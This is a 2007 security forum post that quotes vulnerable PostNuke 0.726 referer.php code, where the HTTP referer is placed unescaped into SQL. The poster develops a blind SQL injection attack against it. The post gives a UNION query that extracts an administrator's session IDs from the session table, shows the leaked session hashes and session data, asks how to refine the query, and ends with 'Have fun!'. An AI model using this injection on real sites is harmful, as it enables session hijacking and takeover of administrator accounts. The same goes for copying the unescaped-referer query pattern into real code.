|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 73
Members: 0
Total: 73
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
PostNuke 0.726 |
|
Posted: Sat Jun 02, 2007 8:13 pm |
|
|
mimic |
Beginner |
|
|
Joined: Jun 02, 2007 |
Posts: 2 |
|
|
|
|
|
|
|
If you don't have PostNuke-0.726.tar.gz, just google it!
Excerpt from referer.php :
Code: |
/***
* Lets select from the table where we have $HTTP_REFERER (whether it be
* a valid referer or 'bookmark'. if we return 1 row, that means someones
* used this referer before and update the set appropriatly.
*
* If we dont have any rows (it returns 0), we have a new entry in the
* table, update accordingly.
*
* After we figure out what SQL statement we are using, lets perform the
* query and we're done !
*/
$check_sql = "SELECT count($column[rid]) as c
FROM $pntable[referer]
WHERE $column[url] = '" . $HTTP_REFERER . "'";
$result = $dbconn->Execute($check_sql);
if ($result === false) {
PN_DBMsgError($dbconn, __FILE__, __LINE__, "Error accesing to the database");
}
$row = $result->fields;
$count = $row[0];
if ($count == 1 ) {
$update_sql = "UPDATE $pntable[referer]
SET $column[frequency] = $column[frequency] + 1
WHERE $column[url] = '" . $HTTP_REFERER . "'";
} else {
/***
* "auto-increment" isn't portable so we have to use the standard
* interface for grabbing sequence numbers. The underlying
* implementation handles the correct method for the RDBMS we are
* using.
*/
$rid = $dbconn->GenId($pntable['referer'], true);
$update_sql = "INSERT INTO $pntable[referer]
($column[rid],
$column[url],
$column[frequency])
VALUES
(" . pnVarPrepForStore($rid). ",
'" . pnVarPrepForStore($HTTP_REFERER) . "',
1)";
}
$result = $dbconn->Execute($update_sql);
if ($result === false) {
error_log ("error in referer.php, " . __LINE__ . ", sql='$update_sql'");
PN_DBMsgError($dbconn, __FILE__, __LINE__, "Error accesing to the database");
}
if ( $DEBUG == 1) {
echo "<br>".$check_sql."<br>".$update_sql."<br>";
}
}
}
|
This is a great job for (not Superman) Blind SQL Injection. It's possible with craftly modified referers
SQL:
Code: |
UPDATE $pntable[referer]
SET $column[frequency] = $column[frequency] + 1
WHERE $column[url] = '" . $HTTP_REFERER . "'
|
Try#1:
Code: |
mysql> select count(pn_rid) from nuke_referer where pn_url = 'bookmarkz' union all select pn_sessid from nuke_session_info where pn_uid = 2 and '1' = '1';
|
Result:
Code: |
+----------------------------------+
| count(pn_rid) |
+----------------------------------+
| 0 |
| bb816071d1a45a3909d068006fa6da3c |
| 71aa76010a67eaaa55ed022be7a4761e |
+----------------------------------+
|
How can I limit the result?
Another infos:
Code: |
mysql> select * from nuke_referer;
+--------+----------+--------------+
| pn_rid | pn_url | pn_frequency |
+--------+----------+--------------+
| 1 | bookmark | 21 |
+--------+----------+--------------+
|
Sessions:
Code: |
mysql>select pn_sessid,pn_ipaddr from nuke_session_info;
+----------------------------------+-----------+--------+
| pn_sessid | pn_ipaddr | pn_uid |
+----------------------------------+-----------+--------+
| bb816071d1a45a3909d068006fa6da3c | 127.0.0.1 | 2 |
| 71aa76010a67eaaa55ed022be7a4761e | 127.0.0.1 | 2 |
| 90b3f0d35b2dd582c99e176653a19ed1 | 127.0.0.1 | 0 |
| 401bb0de7e55b5f0718e697afef59d0e | 127.0.0.1 | 0 |
| 5c5ccf872e219943eca85fde06b929f8 | 127.0.0.1 | 0 |
+----------------------------------+-----------+--------+
and
mysql> select pn_firstused,pn_lastused,pn_vars from nuke_session_info;
+--------------+-------------+--------------------------------------------------
+
| pn_firstused | pn_lastused | pn_vars
|
+--------------+-------------+--------------------------------------------------
+
| 1180804898 | 1180812208 | PNSVrand|i:16031;PNSVlang|s:3:"eng";PNSVuid|i:2;
|
| 1180805276 | 1180813491 | PNSVrand|i:27561;PNSVlang|s:3:"eng";PNSVuid|i:2;
|
| 1180810251 | 1180810253 | PNSVrand|i:16094;PNSVlang|s:3:"eng";
|
| 1180812224 | 1180812473 | PNSVrand|i:7944;PNSVlang|s:3:"eng";
|
| 1180812536 | 1180812561 | PNSVrand|i:25239;PNSVlang|s:3:"eng";
|
+--------------+-------------+--------------------------------------------------
|
Have fun! |
|
|
|
|
|
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|